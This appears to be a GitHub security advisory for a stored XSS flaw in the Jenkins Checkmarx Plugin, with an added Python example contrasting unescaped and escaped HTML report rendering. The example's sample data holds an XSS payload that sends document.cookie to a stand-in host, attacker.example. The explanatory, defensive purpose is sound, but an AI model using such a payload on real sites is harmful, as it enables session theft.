GHSA-p86x-75j8-w4xh

GitHub Security Advisory

Stored XSS vulnerability in Jenkins Checkmarx Plugin

GitHub Reviewed · Severity: HIGH · Has CVE

Advisory Details

Checkmarx Plugin processes Checkmarx service API responses and generates HTML reports from them for rendering on the Jenkins UI.

Checkmarx Plugin 2022.3.3 and earlier does not escape values returned from the Checkmarx service API before inserting them into HTML reports. This results in a stored cross-site scripting (XSS) vulnerability.

Jenkins users without Overall/Administer permission are not allowed to configure the URL to the Checkmarx service, so a low-privileged user cannot simply point the plugin at a server they control. The vulnerability is still exploitable by an attacker in a man-in-the-middle position between Jenkins and the Checkmarx service, who can tamper with API responses and thereby inject script into reports that are then rendered for every user viewing them.

Checkmarx Plugin 2022.4.3 escapes values returned from the Checkmarx service API before inserting them into HTML reports.
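The following is an added illustration of the flaw class described above and of the fix, written in Python for readability; it is not code from the Checkmarx Plugin (which is Java) and the response fields (`projectName`, `queryName`, `severity`, `fileName`) and the constructed tampered response are assumptions, not the real Checkmarx API format. It renders the same constructed API response once the pre-2022.4.3 way (values interpolated into HTML verbatim) and once with every API-derived value HTML-escaped, then runs a simple check a plugin test suite could use to catch regressions.

```python
import html
import json
import re

# Constructed sample (not a real Checkmarx response): a scan-results payload
# after an attacker in a man-in-the-middle position has injected a script
# payload into a free-text field. Field names are assumptions for illustration.
TAMPERED_API_RESPONSE = json.dumps({
    "projectName": "payments-service",
    "results": [
        {"queryName": "SQL_Injection", "severity": "High",
         "fileName": "src/db/Query.java"},
        {"queryName": '<img src=x onerror="fetch(\'https://attacker.example/\'+document.cookie)">',
         "severity": "Low", "fileName": "README.md"},
    ],
})


def render_report_vulnerable(api_json: str) -> str:
    """Pre-2022.4.3 style behaviour: API values are interpolated into HTML verbatim.
    Anything the service (or a man-in-the-middle) returns becomes live markup."""
    data = json.loads(api_json)
    rows = "".join(
        f"<tr><td>{r['queryName']}</td><td>{r['severity']}</td><td>{r['fileName']}</td></tr>"
        for r in data["results"]
    )
    return f"<h1>Checkmarx results for {data['projectName']}</h1><table>{rows}</table>"


def render_report_fixed(api_json: str) -> str:
    """Hardened behaviour: every API-derived value is HTML-escaped at the point of
    insertion. quote=True also escapes ' and ", so the same escaper is safe for
    values that end up inside attribute values, not only in element text."""
    data = json.loads(api_json)

    def esc(value) -> str:
        return html.escape(str(value), quote=True)

    rows = "".join(
        f"<tr><td>{esc(r['queryName'])}</td><td>{esc(r['severity'])}</td><td>{esc(r['fileName'])}</td></tr>"
        for r in data["results"]
    )
    return f"<h1>Checkmarx results for {esc(data['projectName'])}</h1><table>{rows}</table>"


# The template itself only ever emits these tags; any other "<tag" in the
# output means untrusted data reached the HTML unescaped.
_UNEXPECTED_TAG = re.compile(r"<(?!/?(?:h1|table|tr|td)\b)[a-zA-Z]")


def contains_unexpected_markup(report_html: str) -> bool:
    """Regression check: True if the rendered report contains markup that did
    not come from the template, i.e. API data leaked into HTML unescaped."""
    return _UNEXPECTED_TAG.search(report_html) is not None


if __name__ == "__main__":
    vulnerable = render_report_vulnerable(TAMPERED_API_RESPONSE)
    fixed = render_report_fixed(TAMPERED_API_RESPONSE)
    print("vulnerable report leaks markup:", contains_unexpected_markup(vulnerable))
    print("fixed report leaks markup:     ", contains_unexpected_markup(fixed))
```

The essential point is that escaping happens at the HTML sink for every value, not selectively for fields that "look" like text: a project name, file path or query name is as untrusted as any other byte returned by the remote service. In Java plugin code the equivalent step is an HTML escaper such as `hudson.Util.escape` or `org.apache.commons.text.StringEscapeUtils.escapeHtml4` applied to each value before it is concatenated into the report (stated here as general guidance, not as a description of the plugin's actual 2022.4.3 change).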

Affected Packages

Maven com.checkmarx.jenkins:checkmarx
Affected versions: >= 0, < 2022.4.3 (fixed in 2022.4.3)

Related CVEs

Key Information

GHSA ID
GHSA-p86x-75j8-w4xh
Published
December 12, 2022 9:30 AM
Last Modified
December 16, 2022 11:00 PM
CVSS Score
7.5 / 10 (HIGH)
Primary Ecosystem
Maven
Primary Package
com.checkmarx.jenkins:checkmarx
GitHub Reviewed
✓ Yes

Dataset

Last updated: July 5, 2025 6:26 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.